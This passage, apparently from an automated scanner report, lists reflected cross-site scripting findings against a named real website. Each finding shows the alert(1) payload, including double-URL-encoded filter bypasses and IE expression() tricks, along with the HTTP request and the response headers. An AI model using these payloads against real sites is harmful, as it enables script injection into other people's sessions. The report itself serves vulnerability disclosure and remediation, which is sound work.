HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: ASP.NET_SessionId=jpp44c45no3vndyg0eiqfdaq; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53118%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c23085e6306 was submitted in the REST URL parameter 2. This input was echoed as 53118"style="x:expression(alert(1))"c23085e6306 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloads/53118%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c23085e6306 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:00 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:00 GMT; path=/ Set-Cookie: ASP.NET_SessionId=slhjyjfmrcmjlrjjdpmdykfr; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8753 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.19. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/downloads/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ce2"style%3d"x%3aexpression(alert(1))"09bdff38fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43ce2"style="x:expression(alert(1))"09bdff38fc4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads/x22?43ce2"style%3d"x%3aexpression(alert(1))"09bdff38fc4=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:41 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:41 GMT; path=/ Set-Cookie: ASP.NET_SessionId=tew4y345qibicu55t1rjfuqe; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8795 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.20. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/downloads/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c9a5"style%3d"x%3aexpression(alert(1))"c2aa39074d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c9a5"style="x:expression(alert(1))"c2aa39074d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads/x22?5c9a5"style%3d"x%3aexpression(alert(1))"c2aa39074d2=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ssgwag55ef2suzf5q24jnl45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8795 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94da6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522861bf406f44 was submitted in the REST URL parameter 1. This input was echoed as 94da6"style="x:expression(alert(1))"861bf406f44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /94da6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522861bf406f44/charts/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: ASP.NET_SessionId=3yzxhc55ehds33jqb4uatink; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8760 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a48df%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d7925e086c3 was submitted in the REST URL parameter 1. This input was echoed as a48df"style="x:expression(alert(1))"d7925e086c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /examplesa48df%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d7925e086c3/charts/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ty0lqe55q5mcnibk2sdorqzz; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8816 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a543%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac716871498 was submitted in the REST URL parameter 1. This input was echoed as 4a543"style="x:expression(alert(1))"ac716871498 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /4a543%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac716871498/reviews HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:31 GMT Content-Length: 8739 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: ASP.NET_SessionId=3c4tc255quiohy55truamgmu; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc399%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa008f34339 was submitted in the REST URL parameter 1. This input was echoed as cc399"><script>alert(1)</script>aa008f34339 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cc399%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa008f34339/reviews?id=349540/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:45 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:45 GMT; path=/ Set-Cookie: ASP.NET_SessionId=0vufwvz10dn1v0up3yasccey; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8900 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bfab%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522fd877cbaba1 was submitted in the REST URL parameter 1. This input was echoed as 7bfab"style="x:expression(alert(1))"fd877cbaba1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product7bfab%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522fd877cbaba1/reviews HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/ Set-Cookie: ASP.NET_SessionId=irozqj45lpljwj55wgoccn55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8788 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aea0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec7ddeeb9a3d was submitted in the REST URL parameter 1. This input was echoed as 7aea0"><script>alert(1)</script>c7ddeeb9a3d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product7aea0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec7ddeeb9a3d/reviews?id=349540/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/ Set-Cookie: ASP.NET_SessionId=1fckz3ilanwcrr45tvw5eu55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8949 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7aeb62331a was submitted in the REST URL parameter 2. This input was echoed as f5bf0"><script>alert(1)</script>a7aeb62331a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/reviewsf5bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7aeb62331a?id=349540/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: ASP.NET_SessionId=b4ntfe451a35d0z3actuq255; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8949 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a75f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224417cefb817 was submitted in the REST URL parameter 2. This input was echoed as a75f4"style="x:expression(alert(1))"4417cefb817 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/a75f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224417cefb817 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/ Set-Cookie: ASP.NET_SessionId=fv4eqq55u13gyheum3ewifj0; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8739 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd2b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522f1b2d917b08 was submitted in the REST URL parameter 2. This input was echoed as 6bd2b"style="x:expression(alert(1))"f1b2d917b08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/reviews6bd2b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522f1b2d917b08 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:36 GMT Content-Length: 8788 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/ Set-Cookie: ASP.NET_SessionId=sktfbrnh1dtwviaawiverx45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96803%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edfbbf862323 was submitted in the REST URL parameter 2. This input was echoed as 96803"><script>alert(1)</script>dfbbf862323 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/96803%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edfbbf862323?id=349540/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:51 GMT Content-Length: 8900 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/ Set-Cookie: ASP.NET_SessionId=smkoxh55k01vvq55ighs2efj; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5812"><script>alert(1)</script>d208eaaaa24 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/reviews?id=349540/x22/x3eSmartDrawc5812"><script>alert(1)</script>d208eaaaa24 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b82"><script>alert(1)</script>2e1c8977753 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/reviews?id=74b82"><script>alert(1)</script>2e1c8977753 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.33. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/product/reviews
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2401f"><script>alert(1)</script>0614465aa10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/reviews?2401f"><script>alert(1)</script>0614465aa10=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.34. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/product/reviews
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dadb8"><script>alert(1)</script>9e1a39efb8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/reviews?dadb8"><script>alert(1)</script>9e1a39efb8f=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1 was submitted in the REST URL parameter 1. This input was echoed as c202c"style="x:expression(alert(1))"1983cde1eb1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
